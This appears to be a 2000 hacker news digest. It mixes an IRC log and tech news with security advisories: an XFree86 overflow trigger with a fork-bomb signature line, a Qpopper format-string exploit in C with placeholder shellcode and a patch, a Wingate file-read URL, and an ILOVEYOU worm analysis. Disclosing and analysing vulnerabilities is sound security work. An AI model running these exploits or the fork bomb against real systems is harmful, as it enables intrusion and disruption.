[20:53] <Amoeba> see, I know the technical terminology and programs
[20:53] <MrEreet> yep
[20:53] <MrEreet> mixter wrote it
[20:53] <Amoeba> yeah
[20:53] <Amoeba> and is the real mixter on?
[20:53] <MrEreet> ya
[20:54] <Amoeba> cool
[20:54] <MrEreet> mixter_ thats him
[20:54] <Amoeba> oh
[20:54] <Amoeba> he's away
[20:54] <Amoeba> tuesday may 16th
[20:54] <MrEreet> #!b0f
[20:55] <MrEreet> http://b0f.freeBSD.lublin.pl/
[20:55] <Amoeba> what is that for?
[20:55] <Amoeba> oh
[20:55] <MrEreet> bbl
[20:56] <Amoeba> ok
[21:24] *** sku|| has quit IRC (irc-w.frontiernet.net irc.Prison.NET)
[21:32] <MrEreet> fucking packet kiddies
[21:32] <MrEreet> lol
[21:53] <Amoeba> ?
[21:58] *** Debris has quit IRC (Read error 54: Connection reset by peer)
[23:00] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98)
[23:02] *** Debris (3223@*.uu.net) has joined #media-admin
[23:02] *** MrEreet sets mode: +o Debris
[23:17] *** Amoeba (GTO@dialup-*.Level3.net) has left #media-admin
[23:22] *** SugarKing has quit IRC (Leaving)
<SNIP>
Later on the press release site this was posted...
-=-
IT'S A HOAX
This has been a g0at security attempt at getting hits to our currently down,
webpage. Although the page is not active at the current instance. Please try
it again sometime in the near future.
And for those stupid people, no mafiaboy is not giving an interview.
END
@HWA
224.0 [IND] XFree86 3.3.6 buffer overflow to root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bugtraq
XFree86 3.3.6 (and probably 4.0.0 as well ;) - by running X server (no
matter it's setuid, or called from setuid Xwrapper - works in both cases,
seems to me Xwrapper in default RH 6.x distro is rather dumb ;) with
-xkbmap parameter and over 2100 of 'A's (or shellcode, again, it's rather
trivial to exploit :), you'll get beautiful overflow with root privileges
in main (Xserver) process...
listen to the gdb... Cannot access memory at address 0x41414141.
This has been tested both with recent RH6.1/6.2 Xservers (3.3.5/3.3.6),
and:
XFCom_i810 Version 1.0.0 / X Window System
(protocol Version 11, revision 0, vendor release 6300)
Release Date: October 13 1999
Btw. while testing this bug, we have noticed strange behaviour of some
drivers. For example, in one case we get kernel oops, just like that
(linux 2.2.14, XFree86 3.3.6 XF86_S3V):
eip: 41414141 eflags: 00013296
eax: 00000000 ebx: 00000000 ecx: 00000bb8 edx: 00000009
esi: bfffe92c edi: 00000400 ebp: 00000000 esp: bfffe464
Stack: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
:)
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
@HWA
225.0 [MM] Power your PC with a potato!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://news.bbc.co.uk/hi/english/sci/tech/newsid_759000/759529.stm
Potato-powered computer
Chips with everything, even potatoes
By BBC News Online internet reporter Mark Ward
UK technology enthusiasts have found a way
to power a computer using potatoes.
The computer fans, who run a website called
Temple ov thee Lemur, decided to build the
spud server because someone bet them that it
could not be done.
Although science kits that power a digital clock
off a potato or two are available, few people
have tried anything larger.
Steve Harris, spokesman for the group, said to
lighten the load on the potato power pack the
group had first to make a low power version of
a web server.
Surfers limited
These computers are usually powerful,
high-memory versions of the PCs people have
on their desks. But there was no way a bag of
potatoes would provide enough power for one
of those, said Mr Harris.
For the server the group cannibalised an old
computer containing a low-power Intel 386 chip.
They removed everything but the central chip and
its associated circuitry. The place of the hard
disk was taken by another custom-built chip that
had the server software and the two pages of the
website permanently "burned" into it.
Even this small server needs around 12
potatoes to power it and the spuds have to be
changed every couple of days.
Each potato generates about half a volt. The
web pages hosted by the server can be
browsed but the machine limits the number of
people that can view it every minute to ensure
it is not overwhelmed.
Limited hardware
Potatoes can be used as batteries because
the flesh of the vegetable acts as a very thick
electrolyte - like the acid in a car battery.
When electrodes made of zinc and copper are
stuck into the potato the electrochemical
reaction produces a power flow. The salty
flesh of the potato allows ions to cross from
one electrode to another.
Pictures of the potato-powered server are
available but Mr Harris said they were taken
when the system was not switched on. "The
power connectors were plugged in the wrong
way round and it would have been fatal to the
hardware if it had been live," he said.
The spud server is the latest in a series of
attempts by technology fans to get the most
out of very limited hardware.
A Dutch company is making web servers using
old Commodore 64 computers that were
popular in the mid-1980s. Several web servers
are run off old Amiga computers and there is
even a project to turn hand held computers
such as the Palm into low volume web servers.
-=-
Subject: Potatoe run server ;)
Author: BHZ
Date: 05-24-2000 19:12
http://152.78.65.48:2300 is the addy :)
UK technology enthusiasts have found a way to power a computer
using potatoes.
The computer fans, who run a website called Temple ov thee Lemur,
decided to build the spud server because someone bet them that it
could not be done.
Although science kits that power a digital clock off a potato or
two are available, few people have tried anything larger.
Steve Harris, spokesman for the group, said to lighten the load on
the potato power pack the group had first to make a low power
version of a web server.
[http://news.bbc.co.uk/hi/english/sci/tech/newsid_759000/759529.stm]
@HWA
226.0 [MM] Mobile phones fertile for E-bugs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.newscientist.com/news/news_223928.html
Is your phone infected?
Mobiles are fertile ground for e-bugs of the
future
IN THE wake of the Love Bug virus attack, computer scientists
are warning that future viruses aimed at intelligent mobile
phones and personal digital assistants (PDAs) may be even
worse. They could record your conversations and forward
them to others, delete money from "electronic wallets", or
perhaps rack up huge telephone bills. "These viruses could
spread rapidly in future," predicts David Chess, an antivirus
researcher at IBM's T. J. Watson Research Center in Yorktown
Heights, New York.
Computer viruses attack devices that are programmable, and
spread when there is some link between one device and
another. Early viruses spread mainly via infected discs handed
from user to user. Today the main avenue of infection is by
e-mail.
"The thing that makes viruses a threat is that we're so well
connected," says Charles Palmer, a specialist in network
security and cryptography research at IBM. This suggests
there is a huge potential for viruses to spread via future
programmable mobiles.
In current and next-generation phones, and in PDAs, designers
have several ways to prevent virus damage. First, they can
limit the devices' programmability, leaving them without the
capacity to run viruses. Current phones already fall into this
category--but future generations will be much more capable.
Another option is to store important programs in read-only
memory so that a virus cannot overwrite them. "The drawback
then is that the phone cannot be upgraded," says Edward
Felton, a computer scientist at the Secure Internet
Programming Laboratory at Princeton University in New Jersey.
And this strategy cannot protect data that the user adds, as
it must be stored in a writable memory. "A virus that changes
your mom's number to a premium-rate number in Nigeria could
rack up huge bills," says Palmer.
Finally, it is possible to ensure that a phone's built-in programs
are separate, so that one program cannot start another. If the
virus cannot dial out, it cannot spread.
But researchers say there is huge pressure on cellphone
designers to add functions, and that this will increase the
chances of infection. "If somebody sends you a telephone
number by e-mail, you want to be able to click on that number
to dial it," says Avi Ruben, a specialist in Internet security at
the AT&T Laboratories in Florham Park, New Jersey. "I know
that there are prototypes in development that allow this kind
of threat," adds Felton.
When e-mail attachments can trigger other applications, they
could dial out, start recording software for personal
surveillance, or wipe out the contents of files such as
electronic wallets.
However, Charles Davies, chief technology officer for the
British PDA maker Psion, argues that this scenario is unlikely,
at least for devices that run the widely used EPOC operating
system, which he helped to design. "I don't want to seem
smug or complacent but I just don't see it as a big threat," he
says.
Palmer sees the way forward in mathematical proofs that show
whether a system is secure, and calls for more research into
the area. "It's the only choice we have in the long run," he
says.
Justin Mullins
@HWA
227.0 [MM] The virtual threat
~~~~~~~~~~~~~~~~~~~~~~~
http://www.economist.com/editorial/freeforall/current/index_survey.html
THE most remarkable thing about the effect of the Internet
on the financial-services sector is not how pervasive it has
been; it is how limited a transformation it has so far
wrought. Financial institutions, after all, deal in a
product--money--that for many of their customers has
long been "virtual". Bank-account holders are used to the
notion that their cash is represented by a series of numbers
on a monthly statement generated by a computer, or by the
glowing green figures of a cash machine. And they have
become accustomed to making payments using pieces of
plastic backed with a clever magnetic strip. The Internet
might have been designed for the distribution, monitoring
and management of this ubiquitous electronic commodity.
More worryingly for the firms that make their living out of
arranging financial transactions, the Internet might also have
been designed to do away with them. Banks and other
financial firms are intermediaries, standing between lenders
and borrowers, savers and spenders. For decades, banks
in rich countries have been fretting about how to cope with
"disintermediation": lenders dealing direct with borrowers
(as many do already in the capital markets), without using a
bank's balance sheet to add a layer of cost. The Internet
is, potentially, the greatest force for disintermediation the
banks have ever had to tackle. Other intermediaries, such
as retailers, face the same problem. But money, unlike,
say, an item of clothing, is a commodity that can actually be
used, transferred and delivered electronically.
Samuel Theodore, of Moody's, a credit-rating agency,
believes the banks are currently undergoing their "fourth
disintermediation". The first involved savings, and the
growth of mutual funds, specialised pension funds and
life-insurance policies at the expense of bank deposits; the
second saw the capital markets take on some of the
banks' traditional role as providers of credit; in the third,
advances in technology helped to streamline back-office
operations. Now, in the fourth stage, the distribution of
banking products is being disintermediated. This process
has been going on for some years, with the spread of
automated teller machines (ATMs) and, over the past
decade or so, telephone banking and PC-based proprietary
systems; but the Internet hugely enlarges its scope.
Spotty youth
Yet, except for one activity, share-trading, and one part of
the world, Scandinavia, Internet-based financial retailing is,
if not in its infancy, then scarcely at puberty. And wholesale
banking, although it relies heavily on complex electronic
trading systems and information technology, is still
conducted mostly on closed proprietary networks. To be
sure, there are some signs that the disintermediation the
industry fears may be starting. Internet banks, with their
low costs--and their dot.com habit of paying more
attention to the acquisition of customers than the turning of
profits--have drawn deposits away from offline banks in
some countries. And in the capital markets, bond issues
and share offerings have been syndicated and distributed
over the Internet. Some highly rated borrowers have for
years been borrowing through their own issues of
commercial paper. The Internet can only enhance the
appeal of do-it-yourself fund-raising.
But these are just the early signs of an upheaval that is
gathering momentum by the day. There are a number of
reasons why many online financial services have been slow
to catch on, and why they can now be expected to
develop faster. Concerns about the security of Internet
transactions, a particularly important issue for financial
dealings, are gradually being eased. Internet use, even in
the rich world, has been patchy, but is spreading fast. And
whereas conducting financial transactions online up to now
has often been clunky and annoying, the technology is
improving all the time. Those technological advances are
also liberating the Internet from the confines of the PC (see
article).
Most important, financial institutions themselves, which in
the past have often resisted change, may now become its
most ardent promoters. Having invested heavily in their
own systems, banks were understandably reluctant to
jettison them for web-based replacements. And adapting
their own processes for the Internet has often proved
cumbersome and difficult. Moreover, until recently banks
faced little pressure from their customers to change what
were seen as useful but boring services, much the same as
electricity and gas. But soon, in many countries, customers
will expect an online service as a matter of course.
The banks' staff, too, have been reluctant to abandon the
old ways of doing things. Besides, those old ways have
often been extremely profitable, so change threatens not
just working habits, but the bottom line too. Now,
however, almost every financial firm, from the swankiest
Wall Street investment bank to the provider of microcredit
to the very poor, has found that it has no choice but to
invest in an "Internet strategy". And having invested in it, it
will need to persuade its customers to use it. So in areas
where the advantages of doing business online may not be
obvious to the consumer--notably in retail banking--the
banks may find themselves trying to coax, bribe and bully
reluctant customers online.
The banks' conservatism, on which they used to pride
themselves, has become an embarrassment. It has also
been spotted by the new breed of Internet entrepreneur
taking aim at the banks' business. The models are firms
such as E*Trade and Charles Schwab, discount
stockbrokers that found in the Internet a means of
challenging even the biggest and most prestigious traditional
firms. Now commercial and investment banks, fund
managers and financial advisers are all vying with each
other to present themselves as Internet-savvy, and boasting
about their investment in online services.
All this has created a strange, contradictory world. Clever
young things with a bright idea and a few million dollars of
venture capital behind them talk cheerily of the demise of
traditional banks. Bill Gates, no less, said six years ago that
banking is necessary, but banks are not. Now, the story
goes, they are irredeemably hampered by their "legacy
systems"--their existing management structures, staffing
levels and computers--and by their "channel
conflicts"--between what they do now, and online
methods of sales and distribution. Their bosses simply do
not "get it". Or, even if they do, their institutions are so
deeply rooted in the old economy and pre-Internet styles
of business that there is no point in turning them around.
The dinosaurs in the supposedly stuffy offices of these big
banks and securities firms appear unaware that a meteorite
may be on its way to obliterate them. On the contrary,
resolutely upbeat online-service managers, often rather
self-conscious in their tieless, suitless new-economy
uniforms, claim they are having the times of their lives.
Never has technology revealed so many new avenues for
developing the business. It is, says Denis O'Leary, who
runs Chase Manhattan's Chase.com, "a golden age".
Not least because, in the industrialised West, many firms
have been making bigger profits than ever. Years of
economic expansion and bull markets have yielded good
income from traditional lending, from trading and from
investment. The only obvious cloud in the sky is that
banks' share prices seem not to reflect this (see chart 1).
Indeed, in some countries, such as Britain, they imply that
the market expects banks' profits to collapse in the next
few years. Even the stockmarket seems to believe the
dot.com wannabes, and rewards them with much richer
valuations than boring old-economy banks.
Still kicking
And yet this survey will argue that many of the older
institutions have a good story to tell. The "legacy systems"
at which the upstarts scoff have one big virtue: they have
tended, by and large, to work. Big banks process trillions
of dollars a day. It is almost inconceivable that they might
close down for a few hours because some clever Internet
saboteur has found a way of snarling up their technology
(as has recently happened to some of the biggest
websites). Existing banks have customers in numbers that
newcomers can only dream of, and even unpopular
incumbents benefit from their customers' inertia.
The Internet also brings established firms huge
opportunities as well as threats. To take two important
examples, it offers ways of cutting costs and of marketing
products much more efficiently. For years, in America,
Europe, Japan and elsewhere, the industry has been
consolidating: bank after bank has been taken over by or
teamed up with an institution in a complementary line of
business. Usually, these deals are justified to shareholders
by the extra returns that can be generated once
overlapping costs are stripped out. The Internet,
potentially, offers a way of taking a knife to whole layers of
costs. Once a customer is convinced to carry out most of
his transactions online, his account becomes much cheaper
to administer.
The other much-cited benefit of consolidation is
"cross-selling"--of insurance policies to bank-account
holders, for example. Yet so far this has rarely been all that
successful in practice. The Internet can be a
precision-guided marketing tool. For example, if you apply
online for a credit card from NextCard, an American
Internet operation, you will be offered a choice of three
charging structures. To qualify for the most favourable, you
have to transfer a certain outstanding balance from your
other credit cards. That sum will--fancy that!--be the
actual total of your other balances, which NextCard has
just ascertained online from the credit bureaus. Or, in
wholesale finance, suppose you are a potential investor in a
company's initial public offering of shares, and have just
finished watching the boss boosting his company's
prospects on Merrill Lynch's online investment-banking
service. The phone rings. And yes, it is a Merrill Lynch
salesman who knows you have been watching, and thinks
that now may be the moment to clinch a sale.
But, for banks, each of these pluses comes with a minus.
Because costs are so much lower for Internet-based
transactions, the barriers to entry are lower as well, which
implies that margins will come under pressure. And
although the Internet makes well-directed sales pitches
easier, that is hardly compensation for the precariousness
of online customer relationships. Once your client is on the
Internet, he is only a mouse-click away from your
competitor, and more and more financial sites, search
engines and portals will be pushing competing products at
him. That, too, will squeeze margins.
Viewed from this perspective, for many financial institutions
the Internet is a double bind. Embrace it, and you may still
find yourself losing business, or at least seeing profit
margins dwindle. But ignoring it could be terminal. This
survey will argue that the pressures for change have
become irresistible. It concentrates on places where the
process is most advanced--America and Europe--but the
same lessons apply everywhere. Big financial institutions
are global firms. And on the Internet, change spreads like
wildfire. The stockmarket with the highest proportion of
Internet trading is not, as you might think, in New York,
but in Seoul.
To make the challenge for the industry even more daunting,
the revolution also encompasses the very architecture of
many of the world's biggest financial markets. Stock,
commodity and futures exchanges, clearing and settlement
systems are also being forced to consolidate and
modernise, to prepare for the day when financial
transactions are settled instantaneously.
In public, no bank boss these days would admit to anything
less than whole-hearted enthusiasm for the online
adventure. In private, however, some still see it as just
another distribution channel, perhaps less important than
others, such as the telephone. A few still cling to the dream
that it is a fad they have to indulge because their
shareholders seem to like it. Even such non-believers,
however, are being forced by the market to formulate an
online strategy. If they are too slow, or get it wrong, the
consequences for their firms could be deadly. And if they
still need convincing, they need only look at what has
happened, in just four years, to stockbroking.
http://www.qualisteam.com/eng/conf.shtml
@HWA
228.0 [b0f] Qpopper exploit code
~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.digibel.org/~b0f/advisors/b0f5-Qpopper.txt
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5
Advisory Name: Remote shell via Qpopper2.53
Date: 5/23/00
Application: Qpopper 2.53 for *NIX
Vendor: Qualcomm Incorporated
WWW: www.qualcomm.com
Severity: can give users remote
shell with gid=mail.
Author: prizm (prizm@resentment.org)
Homepage: b0f.freebsd.lublin.pl
* Overview
Qpopper is the most widely-used server for the POP3 protocol. This allows users to
access their mail using any POP3 client. Qpopper supports the latest standards,
and includes a large number of optional features. Qpopper is normally used with
standard UNIX mail transfer and delivery agents such as sendmail or smail.
* The Problem
Yes, Qpop, again and again...
There is a bug in version 2.53 of Qpop that can give you a remote
shell with gid=mail. Problem is with euidl command which uses user input as
format string for pop_msg() function.
Let's examine the following code from Qpop 2.53 source:
--> pop_uidl.c, around line 150:
................
sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
if (nl = index(buffer, NEWLINE)) *nl = 0;
sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
! return (pop_msg (p,POP_SUCCESS, buffer));
^^^^^^^^^^^^^
.................
Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat,
const char *format,...), and here we have user-input as format string. Lame.
Ok, back to problem, imagine following smtp session:
MAIL FROM:<hakker@evil.org>
200 Ok
RCPT TO:<luser@host.withqpop253.com>
200 Ok
data
200 Okey, okey. end with "."
Subject: still trust qpop?=/
X-UIDL: AAAAAAAAAAAAAAAA
From: %p%p%p%p%p%p%p
test
.
200 BLABLABLA Ok, message accepted for delivery.
Then, luser connects with his pop account and runs euidl command there:
+OK QPOP (version 2.53) at b0f starting. <666.666@b0f>
USER luser
+OK Password required for luser.
PASS secret
+OK luser has 3 messages (1644 octets).
euidl 3
+OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028
Yeah, that's from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p
were implemented as arguments for vsnprintf() command.
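The call shape described above, as an added C example (not Qpopper source and not part of the advisory): pop_msg_demo() and the euidl_reply_* helpers are hypothetical stand-ins that show the message-derived line in the format position beside the corrected form, which passes it as data through a constant "%s". The header values are constructed; "%%" is used for the unsafe call because it is interpreted without consuming any argument, so the run stays well-defined.

```c
/* Added illustration, not Qpopper source: pop_msg_demo() and the
 * euidl_reply_* helpers are hypothetical stand-ins. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LINE_MAX_DEMO 512

/* pop_msg()-style helper: `format` is a printf format string, so only
 * trusted, constant text belongs there. Returns the bytes written, or -1
 * if the reply did not fit (vsnprintf reports the length it wanted). */
static int pop_msg_demo(char *out, size_t outlen, const char *format, ...)
{
    va_list ap;
    int n;

    va_start(ap, format);
    n = vsnprintf(out, outlen, format, ap);
    va_end(ap);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Compose "<id> <uidl> <length> <from>" in one bounded call. */
static int build_line(char *buf, size_t buflen, int msg_id,
                      const char *uidl, long length, const char *from)
{
    int n = snprintf(buf, buflen, "%d %s %ld %.128s",
                     msg_id, uidl, length, from);
    return (n < 0 || (size_t)n >= buflen) ? -1 : n;
}

/* BEFORE: message-derived text is handed over as the format string. */
int euidl_reply_unsafe(char *out, size_t outlen, int msg_id,
                       const char *uidl, long length, const char *from)
{
    char buffer[LINE_MAX_DEMO];

    if (build_line(buffer, sizeof buffer, msg_id, uidl, length, from) < 0)
        return -1;
    return pop_msg_demo(out, outlen, buffer);
}

/* AFTER: constant format, message-derived text passed as an argument. */
int euidl_reply_safe(char *out, size_t outlen, int msg_id,
                     const char *uidl, long length, const char *from)
{
    char buffer[LINE_MAX_DEMO];

    if (build_line(buffer, sizeof buffer, msg_id, uidl, length, from) < 0)
        return -1;
    return pop_msg_demo(out, outlen, "%s", buffer);
}

int main(void)
{
    char out[LINE_MAX_DEMO];
    /* Constructed header values. */
    const char *probe = "100%% legit <a@example.org>";
    const char *from_in_advisory = "%p%p%p%p%p%p%p";

    /* The two '%' characters collapse to one: the header was parsed
     * as a format string. */
    if (euidl_reply_unsafe(out, sizeof out, 3, "AAAAAAAAAAAAAAAA", 530, probe) > 0)
        printf("unsafe: %s\n", out);

    /* Both headers come back byte for byte. */
    if (euidl_reply_safe(out, sizeof out, 3, "AAAAAAAAAAAAAAAA", 530, probe) > 0)
        printf("safe:   %s\n", out);
    if (euidl_reply_safe(out, sizeof out, 3, "AAAAAAAAAAAAAAAA", 530,
                         from_in_advisory) > 0)
        printf("safe:   %s\n", out);
    return 0;
}
```

Declaring such a helper with `__attribute__((format(printf, 3, 4)))` lets GCC and Clang flag the unsafe call under `-Wformat-security`.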
* Exploiting
Is this possible? Yeah, sure!
But there are some limits. Qpopper2.53 from FreeBSD ports with patches is
much more difficult to exploit than one from linux. It is because freebsd
patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is
big difference between them. Qpopper with FreeBSD's patches IS exploitable.
Exploit
-------
/* qpop_euidl.c exploit by prizm/Buffer0verflow Security
 *
 * Sample exploit for buffer overflow in Qpopper 2.53.
 * This little proggie generates a mail u need to send.
 *
 * Standard disclaimer applies.
 * By the way, exploit is broken =) You need to insert shellcode.
 *
 * MAD greets to tf8 for pointing out the bug, and all other b0f members.
 * greets to USSRLabs and ADM
 * check http://b0f.freebsd.lublin.pl/ for news.
 */
#include <stdio.h>
#include <stdlib.h>  /* exit() */
#include <string.h>

/* Placeholder only: the author shipped this without a payload. */
char shellcode[]="imnothing";

int main(int argc, char *argv[])
{
    int i;
    unsigned long ra=0;

    if(argc!=2) {
        fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
        exit(0);
    }
    sscanf(argv[1], "%lx", &ra);
    if(!ra)
        return 1;
    /* The placeholder above fails this length check, so the program stops here. */
    if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
        fprintf(stderr,"Bad shellcode\n");
        exit(0);
    }
    fprintf(stderr,"return address: 0x%.8lx\n", ra);
    /* X-UIDL header carries the payload bytes. */
    printf("X-UIDL: ");
    for(i=0; i < (int)sizeof(shellcode);i++)
        printf("%c", shellcode[i]);
    printf("\r\n");
    /* From header: a wide %d field, then the address repeated 50 times
     * as four little-endian bytes. */
    printf("From: %s", "%.1000d");
    for(i=0; i < 50; i++)
        printf("%c%c%c%c", (int)(ra & 0xff), (int)((ra & 0xff00)>>8),
               (int)((ra & 0xff0000)>>16), (int)((ra & 0xff000000)>>24));
    printf("@test\r\n");
    printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
    return 0;
}
Exploiting QPOP from FreeBSD ports
----------------------------------
It is NOT easy, because vsprintf() is replaced with vsnprintf() so we can't
overflow the stack, but we still have control over it (remember %n?).
I'm not going to post an exploit for this because it is really generic, but I
will explain the theory of exploiting qpop with vsNprintf.
There is a little trick with %n you should know. Try to understand why the
following code succeeds and prints out 2000, not sizeof(b):
---<cut>---
#include <stdio.h>
int main(void){
int s=1; char b[1024]; int q;
snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES"));
}
---</cut>---
On my box with FreeBSD 3.4 I have:
2000, overflowed? NO
Hah, the first time I expected to see 1024, but you know that all is
unpredictable. So, this little thing will help us a lot.
Exploiting it:
a) Find where in stack is located user input.
b) Compose a message with the fields X-UIDL and From:
X-UIDL: ppRETARETARETARETA
From: <SHELLCODE>%.RETURNd%n@test
where:
"pp" is for padding (two or three chars)
"RETA" is return address pointing to SHELLCODE
"SHELLCODE" guess
"RETURN" return address
c) Exploit? If you need an exploit that will work on FreeBSD, code it yourself.
* Vulnerable Versions
2.53 (Others?)
* Fix
You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which
is not vulnerable to this problem.
Or you can manually patch it by doing the following:
At lines 150 and 62 from pop_msg.c, replace:
- return (pop_msg (p,POP_SUCCESS, buffer));
to:
+ return (pop_msg (p,POP_SUCCESS, "%s", buffer));
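Review bot: the file named for this change does not match the code quoted earlier in the advisory. The call being replaced, return (pop_msg (p,POP_SUCCESS, buffer));, is shown in pop_uidl.c around line 150, while the instruction above says pop_msg.c, so confirm which file is meant and check every other pop_msg() call in the tree whose third argument is not a string literal. Passing "%s" stops the header text from being parsed as a format, but the advisory also says only the FreeBSD port replaces vsprintf() with vsnprintf() in pop_msg.c, so that bounded call is worth applying alongside this fix on other builds.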
copyright (c) 1999-2000
prizm, buffer0verfl0w security
b0f.freebsd.lublin.pl
@HWA
229.0 [b0f] Wingate advisory
~~~~~~~~~~~~~~~~~~~~~~
http://www.digibel.org/~b0f/advisors/b0f4-Wingate.txt
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 4
Advisory Name: Wingate History database file reading
Date: 02/05/00
Application: Wingate 3.0.5
Vendor: Deerfield.com
WWW: www.deerfield.com
Severity: remote retrieval of the history database file
of the remote wingate server.
Author: axess ( axess@mail.com )
Homepage: www.b0f.com
* Overview
WinGate is Internet-sharing software and is very common.
* The Problem
First I want to add that WinGate versions prior to 2.1 allowed Internet access by default,
but after that version they changed it.
In WinGate 3.0 Home there is no way to change it so that people can access it from the Internet.
In WinGate 3.0 Standard and Pro you can change these bindings.
By researching this I have found that many installations "in the wild" allow connections from the Internet,
so this problem affects many.
Even if not accessible from the Internet, they can always be accessed from the LAN that has it.
When connecting to the logfile server on port 8010 I found that all
the files in the "root" directory of the installed software can be read remotely.
There is nothing particularly interesting besides WinGate's administrator history file.
It contains computer names, usernames and the activity of the users that logged in.
How this information can be used you can figure out yourself.
Besides that, it is a matter of privacy for the users using it that should be kept in mind.
So we just fire our browser away to
http://server.com:8010/
Now we can just add the file we want to download, in this case
http://server.com:8010/history.dbf
* Vulnerable Versions
I have tested the newest version, 3.0.5, on NT4.0.
But I'm pretty sure all versions prior to it are vulnerable to the same problem.
* Fix
Close that stupid port that has always been a problem.
copyright (c) 1999-2000
buffer0verfl0w security
www.b0f.com
@HWA
230.0 [b0f] ILOVEYOU Virus analysis and removal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.digibel.org/~b0f/lamagra/analysis.txt
Analysis of the LOVE-LETTER-FOR-YOU virus/worm
------------------------------------------------------------------------------------------------
The virus/worm hit Belgium and the rest of the world on Thursday 15/04/2000. A lot of important
companies were struck, including banks, factories and my dad's work :). That's where I got the
little bugger. The virus/worm is a big VBScript that spreads by email (smells like Melissa :))
and infects every script on your computer.
Lifecycle
------------------------------------------------------------------------------------------------
It all starts by opening an attachment on an email; then the script starts.
It copies itself into:
$windir/Win32DLL.vbs ($windir = c:\windows on most windows systems)
$systemdir/MSKernel32.vbs ($systemdir = c:\windows\system)
$windir/LOVE-LETTER-FOR-YOU.TXT.vbs
Next it adds those files to the registry so they auto-start on boot.
After that it changes the default page of Internet Explorer; that way it downloads an executable
from a site when IE opens. If the file has already been downloaded it also adds that into the
registry and changes the default page to "about:blank".
Then it starts sending emails with the script attached to all the people in your address list.
Finally the big mess starts: the virus scans every hard disk and network disk for the extensions:
Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg
All files found are overwritten by the virus, and when mp2's or mp3's are found it copies itself
to a vbs script in the same directory. And when mIRC is found a small mIRC script is created
which sends an html page, which tries to infect you using IE, to every user that joins a channel
you're in.
executable
------------------------------------------------------------------------------------------------
It cracks the share passwords and sends those + ipaddr by email to the creator of this virus.
(I couldn't get this program because the server was shut down; thanks to G0Dfarter for checking it)
Disinfection
------------------------------------------------------------------------------------------------
Open regedit and start deleting the malicious entries:
HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\RunServer\Win32DLL
HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run\WIN_BUGSFIX
Search for WIN-BUGSFIX.exe and remove it.
Remove $dirsystem\LOVE-LETTER-FOR-YOU.HTM
Check files with extensions: Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg and check for
infection; if so, delete them (and replace them with the original).
If you have mIRC installed, remove the script.ini file.
Remove all the emails, and maybe warn the people in your address list so they don't open the attachment.
Prevention
------------------------------------------------------------------------------------------------
There is only 1 rule in these cases: do NOT open suspicious files.
The number one reason this virus is so effective is that in Windows everything is linked.
You can control your entire computer from a simple Word macro (and worse).
The best thing to do is turn off all sorts of scripting in Windows (if possible).
Lamagra access-granted@geocities.com http://lamagra.seKure.de
Member of b0f/buffer0verfl0w security http://www.b0f.com
@HWA
231.0 [IND] Intrusion detection on Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.securityfocus.com/focus/ids/articles/linux-ids.html
Intrusion Detection on Linux
by David "Del" Elson
last updated Monday, May 22, 2000
RedHat
Introduction
This article focuses on several host-based intrusion detection systems that are available on Linux. In particular, I will cover some of the basics of installing and setting up these packages, how they are useful, and in what circumstances
they can be used.
Systems Security 101
This article assumes a basic knowledge of systems security. In particular, I will assume that the most basic security measures have already been taken to secure a host against intrusion from the internet. These measures could
include:
Firewalling, to ensure that access to the various TCP and UDP ports of the system that were not intended for internet access are prevented. For example, a basic set of firewalling rules for a web server would ensure that
the only TCP/IP access to the machine was on TCP port 80, the port normally used for HTTP access.
Disabling daemons that are not required. For example: A web server normally needs a process running to serve web pages. Processes that are not associated with serving web pages, such as RPC/Portmap services, NFS
services, X Font Server, DNS name server, and other extraneous and unused applications should be stopped or disabled. On a Red Hat Linux system, this is normally done by using one of the run level editors, for example
ntsysv or tksysv, to disable the startup of any daemon or service that is not required.
Disabling access to ports that are not required, by editing /etc/inetd.conf. Typically, a system will come pre-installed with access to many ports enabled in the /etc/inetd.conf file. Editing this file to remove or comment out any
lines that are not required is the most basic system security activity and should be carried out on all systems.
Lines of Defence
Illustration 1: Multi Layered Systems Security
In this article, I will discuss a multi-layered approach to systems security. Several security layers can be used independently to provide additional protection in case any of the layers should be breached. An example of a
multi-layered security system is shown in illustration 1.
